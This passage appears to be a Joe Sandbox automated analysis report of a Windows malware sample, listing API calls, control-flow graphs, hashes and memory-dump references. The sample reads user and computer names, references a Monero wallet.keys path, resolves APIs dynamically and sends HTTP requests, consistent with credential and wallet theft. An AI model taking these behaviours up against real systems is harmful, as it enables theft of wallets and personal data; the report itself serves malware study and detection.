                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                          • Instruction ID: 3ed7824e0451f198b87b7d0046de5d6d4ebe9940454edba671256a0ecf7e137f
                          • Opcode Fuzzy Hash: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                          • Instruction Fuzzy Hash: F5A13BB5700240DFD374DFA8EA88A6637F9F78C205724856AE686C3A4CDE7F9441CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 de45c0-de4695 RtlAllocateHeap 781 de46a0-de46a6 764->781 782 de474f-de47a9 VirtualProtect 781->782 783 de46ac-de474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DE479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4622
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: c8472a44736e14bc2d0bc15c6720c7b32998b1383afead38275d4c0614e75252
                          • Instruction ID: 1023729206cfa85cde442f608b2585d2a44882422b04f1f781fea129d7217589
                          • Opcode Fuzzy Hash: c8472a44736e14bc2d0bc15c6720c7b32998b1383afead38275d4c0614e75252
                          • Instruction Fuzzy Hash: 354106617C278CEBEE26FFAC8945E9E7656EF4270AF907144E912622C0CFB0B5804935

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 de4880-de4942 call dfa7a0 call de47b0 call dfa740 * 5 InternetOpenA StrCmpCA 816 de494b-de494f 801->816 817 de4944 801->817 818 de4ecb-de4ef3 InternetCloseHandle call dfaad0 call de9ac0 816->818 819 de4955-de4acd call df8b60 call dfa920 call dfa8a0 call dfa800 * 2 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa920 call dfa8a0 call dfa800 * 2 InternetConnectA 816->819 817->816 828 de4ef5-de4f2d call dfa820 call dfa9b0 call dfa8a0 call dfa800 818->828 829 de4f32-de4fa2 call df8990 * 2 call dfa7a0 call dfa800 * 8 818->829 819->818 905 de4ad3-de4ad7 819->905 828->829 906 de4ad9-de4ae3 905->906 907 de4ae5 905->907 908 de4aef-de4b22 HttpOpenRequestA 906->908 907->908 909 de4ebe-de4ec5 InternetCloseHandle 908->909 910 de4b28-de4e28 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa740 call dfa920 * 2 call dfa8a0 call dfa800 * 2 call dfaad0 lstrlen call dfaad0 * 2 lstrlen call dfaad0 HttpSendRequestA 908->910 909->818 1021 de4e32-de4e5c InternetReadFile 910->1021 1022 de4e5e-de4e65 1021->1022 1023 de4e67-de4eb9 InternetCloseHandle call dfa800 1021->1023 1022->1023 1024 de4e69-de4ea7 call dfa9b0 call dfa8a0 call dfa800 1022->1024 1023->909 1024->1021
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE4915
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E00DDB,00000000,?,?,00000000,?,",00000000,?,00840BF0), ref: 00DE4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4EC5
                          • HttpOpenRequestA.WININET(00000000,00840C10,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE4B15
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                          • Instruction ID: 8091c23c60feb5a8c3bac10016096318978e3986fe67815c1896da0bb4d100cd
                          • Opcode Fuzzy Hash: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                          • Instruction Fuzzy Hash: 7212DCB191021CAADB15EB94DC92FEEB378EF54340F5581A9B20A66091DFB02F49CF71
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                          • Instruction ID: b480fa98abc5c20da14bbe751e36b7d0fa4a2222d3c9910be5d0655ce6ad7f0d
                          • Opcode Fuzzy Hash: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                          • Instruction Fuzzy Hash: 5C01A9B1A04209EFC710DF94DD45FAEBBB8F704B21F11421AFA45E3680C7B959048BB1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                          • Instruction ID: 5a448d23c658373e77c34eb349424558cb154523492d71a329491e973fe496e7
                          • Opcode Fuzzy Hash: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                          • Instruction Fuzzy Hash: AFF04FB1E44208EFC724DF98D949FAEBBB8FB04721F10065AFA45A3680C7B955048BA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                          • Instruction ID: 50da218900c40e776c324182e9162bc9c570d019105f0ecda21c70c5030fa801
                          • Opcode Fuzzy Hash: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                          • Instruction Fuzzy Hash: B9D05E74A0030CDBCB20EFE0DC496EDBBB8FB08311F100554D90663740EA315481CBA9

                          Control-flow Graph (function at 0xdf9c10; legend: Executed / Not Executed; graph node and edge data not reproduced)
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00825248), ref: 00DF9C2D
                          • GetProcAddress.KERNEL32(76210000,00825208), ref: 00DF9C45
                          • GetProcAddress.KERNEL32(76210000,00839070), ref: 00DF9C5E
                          • GetProcAddress.KERNEL32(76210000,00838FE0), ref: 00DF9C76
                          • GetProcAddress.KERNEL32(76210000,00839040), ref: 00DF9C8E
                          • GetProcAddress.KERNEL32(76210000,0083ED40), ref: 00DF9CA7
                          • GetProcAddress.KERNEL32(76210000,0082A6A8), ref: 00DF9CBF
                          • GetProcAddress.KERNEL32(76210000,0083ED28), ref: 00DF9CD7
                          • GetProcAddress.KERNEL32(76210000,0083EC50), ref: 00DF9CF0
                          • GetProcAddress.KERNEL32(76210000,0083EC68), ref: 00DF9D08
                          • GetProcAddress.KERNEL32(76210000,0083EDE8), ref: 00DF9D20
                          • GetProcAddress.KERNEL32(76210000,00825228), ref: 00DF9D39
                          • GetProcAddress.KERNEL32(76210000,00825268), ref: 00DF9D51
                          • GetProcAddress.KERNEL32(76210000,00825128), ref: 00DF9D69
                          • GetProcAddress.KERNEL32(76210000,00825328), ref: 00DF9D82
                          • GetProcAddress.KERNEL32(76210000,0083EB30), ref: 00DF9D9A
                          • GetProcAddress.KERNEL32(76210000,0083EB60), ref: 00DF9DB2
                          • GetProcAddress.KERNEL32(76210000,0082A590), ref: 00DF9DCB
                          • GetProcAddress.KERNEL32(76210000,00825148), ref: 00DF9DE3
                          • GetProcAddress.KERNEL32(76210000,0083ED88), ref: 00DF9DFB
                          • GetProcAddress.KERNEL32(76210000,0083EB48), ref: 00DF9E14
                          • GetProcAddress.KERNEL32(76210000,0083ED58), ref: 00DF9E2C
                          • GetProcAddress.KERNEL32(76210000,0083ED70), ref: 00DF9E44
                          • GetProcAddress.KERNEL32(76210000,00824FC8), ref: 00DF9E5D
                          • GetProcAddress.KERNEL32(76210000,0083EB18), ref: 00DF9E75
                          • GetProcAddress.KERNEL32(76210000,0083EBF0), ref: 00DF9E8D
                          • GetProcAddress.KERNEL32(76210000,0083EDA0), ref: 00DF9EA6
                          • GetProcAddress.KERNEL32(76210000,0083EBA8), ref: 00DF9EBE
                          • GetProcAddress.KERNEL32(76210000,0083EBD8), ref: 00DF9ED6
                          • GetProcAddress.KERNEL32(76210000,0083EB90), ref: 00DF9EEF
                          • GetProcAddress.KERNEL32(76210000,0083EC80), ref: 00DF9F07
                          • GetProcAddress.KERNEL32(76210000,0083EC08), ref: 00DF9F1F
                          • GetProcAddress.KERNEL32(76210000,0083EDD0), ref: 00DF9F38
                          • GetProcAddress.KERNEL32(76210000,0082FDA8), ref: 00DF9F50
                          • GetProcAddress.KERNEL32(76210000,0083EC98), ref: 00DF9F68
                          • GetProcAddress.KERNEL32(76210000,0083ED10), ref: 00DF9F81
                          • GetProcAddress.KERNEL32(76210000,00824F88), ref: 00DF9F99
                          • GetProcAddress.KERNEL32(76210000,0083EB78), ref: 00DF9FB1
                          • GetProcAddress.KERNEL32(76210000,008251C8), ref: 00DF9FCA
                          • GetProcAddress.KERNEL32(76210000,0083EDB8), ref: 00DF9FE2
                          • GetProcAddress.KERNEL32(76210000,0083EC20), ref: 00DF9FFA
                          • GetProcAddress.KERNEL32(76210000,00824F48), ref: 00DFA013
                          • GetProcAddress.KERNEL32(76210000,00825288), ref: 00DFA02B
